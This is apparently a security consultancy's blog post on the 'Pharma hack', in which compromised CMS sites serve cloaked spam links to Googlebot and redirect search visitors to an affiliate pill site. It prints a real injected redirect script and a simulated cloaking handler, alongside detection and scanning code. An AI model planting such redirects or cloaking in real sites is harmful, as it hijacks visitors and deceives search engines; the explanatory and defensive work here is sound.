How Does The Pharma Hack Work

Sites running obsolete copies of popular Content Management Systems such as WordPress or Joomla, and/or out-of-date add-ons within those CMSs, are hacked all the time.

In more innocent times you would typically see your home page replaced with a message related to the hacker's cause.

The Pharma hack dates back three or more years, but for the last 12 months we have been monitoring a growing trend of 'invisible' hacks. The hacker gains entry one way or another; as with old-school hacking, their first action is to upload some form of web shell, or to force one to load through a remote file inclusion vulnerability.

Next they make a subtle change, perhaps adding their target word to the home page's title. Because modern browsers show the title only in a tab rather than prominently as older ones did, this goes unnoticed by humans for a few weeks. Alternatively a new folder is created and populated within the file system.

Next, once Google has had time to recrawl the site, find these subtle changes and start moving the site up the search rankings for its new 'keywords', a further stage of hacking takes place. Links are embedded within the site, perhaps with a bit of new content, often linking out to hacked pages within the host site or within other sites.

This phase is clever: the changes are cloaked and aren't visible to normal users. Only Googlebot, Google's search engine crawler, receives the changed content. The hacker's code normally recognises the crawler from its User-Agent header (some kits also check the visitor's IP address), so a normal user who sends a Googlebot User-Agent, tricking the code into thinking they are the search engine, sees the changes too, as does anyone who looks at Google's cached copy of the page.
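The following is an added example, not code from the article or from any hacked site. It models how a User-Agent cloak decides what to serve, and shows the check a site owner can run: request the same page as a browser and as Googlebot, then diff the links. The page markup, the spam links, the hostnames (example.invalid and hacked-neighbour.invalid are reserved names) and the crawler pattern are all constructed for the example; only the Googlebot User-Agent string is the real, published one.

```javascript
// Added example, not the article's code. Models user-agent cloaking and a check that reveals it.
// All markup and hostnames below are constructed for illustration.

const CLEAN_PAGE =
  '<html><head><title>St Example High School</title></head>' +
  '<body><h1>Welcome</h1><a href="/about">About us</a></body></html>';

// The spam block an injected kit appends for crawlers only (constructed).
const SPAM_LINKS =
  '<div style="display:none">' +
  '<a href="http://example.invalid/buy-cheap-pills">buy cheap pills online</a>' +
  '<a href="http://hacked-neighbour.invalid/pharmacy/">online pharmacy</a>' +
  '</div>';

// Crawler test as an injected kit typically writes it: look at the User-Agent header only.
const CRAWLER_UA = /Googlebot|bingbot|Slurp/i;

// Stands in for a compromised template: serves the spam only when the UA looks like a crawler.
function cloakedHandler(request) {
  const ua = request.headers['user-agent'] || '';
  if (CRAWLER_UA.test(ua)) {
    return CLEAN_PAGE.replace('</body>', SPAM_LINKS + '</body>');
  }
  return CLEAN_PAGE;
}

// An untouched site, for contrast: everyone gets the same page.
function cleanHandler(request) {
  return CLEAN_PAGE;
}

// Pull href targets out of HTML. A simple regex is enough to diff injected anchors.
function extractLinks(html) {
  const links = [];
  const re = /<a\s[^>]*href=["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) links.push(m[1]);
  return links;
}

// Googlebot's published User-Agent string, and a typical desktop browser UA.
const GOOGLEBOT_UA = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)';
const BROWSER_UA =
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0 Safari/537.36';

// The check: fetch the same path under both identities and report links only the crawler sees.
function cloakCheck(handler, path) {
  const asBrowser = handler({ path, headers: { 'user-agent': BROWSER_UA } });
  const asCrawler = handler({ path, headers: { 'user-agent': GOOGLEBOT_UA } });
  const seenByBrowser = new Set(extractLinks(asBrowser));
  const crawlerOnlyLinks = extractLinks(asCrawler).filter((href) => !seenByBrowser.has(href));
  return { cloaked: asBrowser !== asCrawler, crawlerOnlyLinks };
}

// Stand-alone run:
console.log(cloakCheck(cloakedHandler, '/'));   // cloaked: true, two crawler-only links
console.log(cloakCheck(cleanHandler, '/'));     // cloaked: false, no crawler-only links
```

Against a live site, replace the handler with an HTTP fetch of the page under each User-Agent. If both responses match but Google's cached copy (or "Fetch as Google" in Search Console) still shows the spam, the kit is identifying the crawler by client IP address rather than by User-Agent, and the cached copy becomes your evidence instead.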

Now this interlinking and inter-promotion of hacked sites using these 'new keywords' promotes the whole network. The hackers are building potential future traffic for all of these sites - but as yet aren't gaining any direct benefit. It takes maybe another month, perhaps slightly more, for the whole network to 'ripen' ready for harvesting.

The final stage: the hacked sites are 're-hacked' with new code that redirects 'normal' traffic landing on the hacked site to the payoff site. This will typically be a semi-legitimate pharmaceuticals website that runs an affiliate scheme. That site gets the sale and the hacker gets a commission fee. Here is some code lifted from one hacked site:

<script>
// <![CDATA[
function bl(){x = document.referrer;if ( (x.indexOf('viagra')!=-1)||(x.indexOf('VIAGRA')!=-1)||(x.indexOf('buy')!=-1)||(x.indexOf('Viagra')!=-1)||(x.indexOf('Buy')!=-1)||(x.indexOf('viagra')!=-1)) {location.replace("http://www.megarxpills.com/viagra.php?affid=34582011");}}bl();
// ]]>
</script>

This code was lifted from the website of a UK Catholic girls' high school (ages 11 to 16). See how inappropriate this is.

The code looks at the referrer: the URL of the page that sent the visitor here, which the browser passes along with the request and exposes to scripts as document.referrer. If that URL contains 'viagra' (in three of its capitalisations; the lower-case check is duplicated, and a mixed-case spelling such as 'vIaGrA' would be missed) or 'buy'/'Buy', the visitor is sent to the viagra page on megarxpills.com and the credit (and therefore the commission) goes to the affiliate with the id 34582011. Anyone arriving directly, from a bookmark or from an innocent link sees the normal page, which is why the site's own staff and regular visitors rarely notice anything.
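The following is an added example, not the article's code: a scanner for the referrer-triggered redirect pattern shown in the lifted snippet. It flags any script that both reads document.referrer and redirects to a host that is not the site's own, and pulls out the affiliate id where one is present. The file names, the site's own hostname and the two clean samples are constructed; the first sample is the snippet quoted above.

```javascript
// Added example, not the article's code. Flags scripts that read the referrer and then
// redirect off-site, extracting the affiliate id. Samples and hostnames are constructed,
// except that the first sample is the snippet quoted in the article.

const OWN_HOSTS = new Set(['www.example-school.sch.uk']); // constructed: the site's own hostnames

const SAMPLES = {
  // the lifted snippet, as it would sit in a template file
  'templates/school/index.php':
    '<script>// <![CDATA[\n' +
    "function bl(){x = document.referrer;if ( (x.indexOf('viagra')!=-1)||(x.indexOf('VIAGRA')!=-1)||" +
    "(x.indexOf('buy')!=-1)||(x.indexOf('Viagra')!=-1)||(x.indexOf('Buy')!=-1)||(x.indexOf('viagra')!=-1)) " +
    '{location.replace("http://www.megarxpills.com/viagra.php?affid=34582011");}}bl();\n' +
    '// ]]></script>',
  // legitimate use of the referrer (a stats beacon, no redirect): must not be flagged
  'templates/school/analytics.js':
    "var img = new Image(); img.src = '/stats.gif?r=' + encodeURIComponent(document.referrer);",
  // legitimate redirect that never looks at the referrer: must not be flagged
  'templates/school/nav.js':
    "if (!location.hash) { location.replace('http://www.example-school.sch.uk/index.php#top'); }",
};

const READS_REFERRER = /document\.referrer/;
// location.replace(...), location.assign(...), location.href = ..., location = ...
const REDIRECTS = /(?:window\.)?location(?:\.replace\s*\(|\.assign\s*\(|\.href\s*=(?!=)|\s*=(?!=))/;
const ABSOLUTE_URL = /https?:\/\/([^/"'\s]+)[^"'\s]*/g;
const AFFILIATE_ID = /[?&](?:aff|affid|aff_id|ref)=([A-Za-z0-9]+)/;

// Returns one finding per off-site absolute URL in a file that reads the referrer and redirects.
function findReferrerRedirects(filename, source) {
  const findings = [];
  if (!READS_REFERRER.test(source) || !REDIRECTS.test(source)) return findings;
  ABSOLUTE_URL.lastIndex = 0;
  let m;
  while ((m = ABSOLUTE_URL.exec(source)) !== null) {
    const host = m[1].toLowerCase();
    if (OWN_HOSTS.has(host)) continue;            // redirects to our own hostnames are fine
    const aff = AFFILIATE_ID.exec(m[0]);
    findings.push({ file: filename, host, url: m[0], affiliateId: aff ? aff[1] : null });
  }
  return findings;
}

// Scan a map of filename -> file contents and collect every finding.
function scanAll(files) {
  return Object.keys(files).reduce(
    (acc, name) => acc.concat(findReferrerRedirects(name, files[name])),
    []
  );
}

// Stand-alone run: one finding, for index.php, host www.megarxpills.com, affiliate id 34582011.
console.log(scanAll(SAMPLES));
```

On a real Joomla or WordPress site, feed it the template or theme directory and the plugins, and also the article and post bodies from the database (Joomla's #__content table, WordPress's wp_posts), since the same script is often injected into content rather than files. The regexes only catch the plain form; a kit that builds the URL with String.fromCharCode or base64 will slip past them, so also diff the files against a clean copy of the CMS and template.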

The site in question, mega rx pills .com, has plausible deniability - they can claim that they didn't do the hack, they didn't authorise the hack. But - they don't make it easy to report these things. When you do, you receive a standard reply back asserting that 'spam isn't something they can do anything about'. When I followed up asserting that I wasn't reporting email spam but hacked websites that link to them with an affiliate id clearly visible, what response did I get?

None.


© Copyright 2002-2016
Dean Marshall Consultancy Ltd - all rights reserved
Registered in England and Wales, Company number 6615299